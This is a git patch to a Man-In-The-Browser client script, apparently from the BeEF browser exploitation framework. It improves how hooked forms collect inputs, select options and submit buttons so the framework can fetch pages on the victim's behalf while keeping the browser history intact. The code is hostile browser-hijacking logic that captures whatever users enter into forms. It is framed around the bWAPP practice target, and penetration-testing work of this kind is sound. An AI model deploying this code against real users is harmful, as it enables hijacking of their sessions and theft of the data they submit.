From e14b5f953acd439128364e9ab52427691c218cdb Mon Sep 17 00:00:00 2001
From: mgeeky <mgeeky@users.noreply.github.com>
Date: Mon, 7 Mar 2016 18:01:37 +0100
Subject: [PATCH] Modified the Man-In-The-Browser logic of building query
 string in form fetching. Previous implementation couldn't handle properly
 option and submit parameters, therefore a MITB-ed user wasn't sending correct
 query string which should include those two more fields. For instance, bWAPP
 application (by IT SEC Games) makes choosing a bug to exploit by submitting
 form consisting of an option and <button> with type=submit. With this patch
 an user behind MITB will be able to successfully fetch the form and thus
 proceed to the next bug.

---
 core/main/client/mitb.js | 25 +++++++++++++++++++++++--
 1 file changed, 23 insertions(+), 2 deletions(-)

diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index 0acf0d74f..1ef3f3506 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -114,18 +114,39 @@ beef.mitb = {
     // Hooks forms and prevents them from linking away
     poisonForm:function (form) {
         form.onsubmit = function (e) {
+
+            // Collect <input> tags.
             var inputs = form.getElementsByTagName("input");
             var query = "";
             for (var i = 0; i < inputs.length; i++) {
-                if (i > 0 && i < inputs.length - 1) query += "&";
                 switch (inputs[i].type) {
                     case "submit":
                         break;
                     default:
-                        query += inputs[i].name + "=" + inputs[i].value;
+                        query += inputs[i].name + "=" + inputs[i].value + '&';
                         break;
                 }
             }
+
+            // Collect selected options from the form.
+            var selects = form.getElementsByTagName("select");
+            for (var i = 0; i < selects.length; i++) {
+                var select = selects[i];
+                query += select.name + "=" + select.options[select.selectedIndex].value + '&';
+            }
+
+            // We should be gathering 'submit' inputs as well, as there are 
+            // applications demanding this parameter.
+            var submit = $j('*[type="submit"]', form);
+            if(submit.length) {
+                // Append name of the submit button/input.
+                query += submit.attr('name') + '=' + submit.attr('value');
+            }
+
+            if(query.slice(-1) == '&') {
+                query = query.slice(0, -1);
+            }
+
             e.preventdefault;
             beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
             history.pushState({ Be:"EF" }, "", form.action);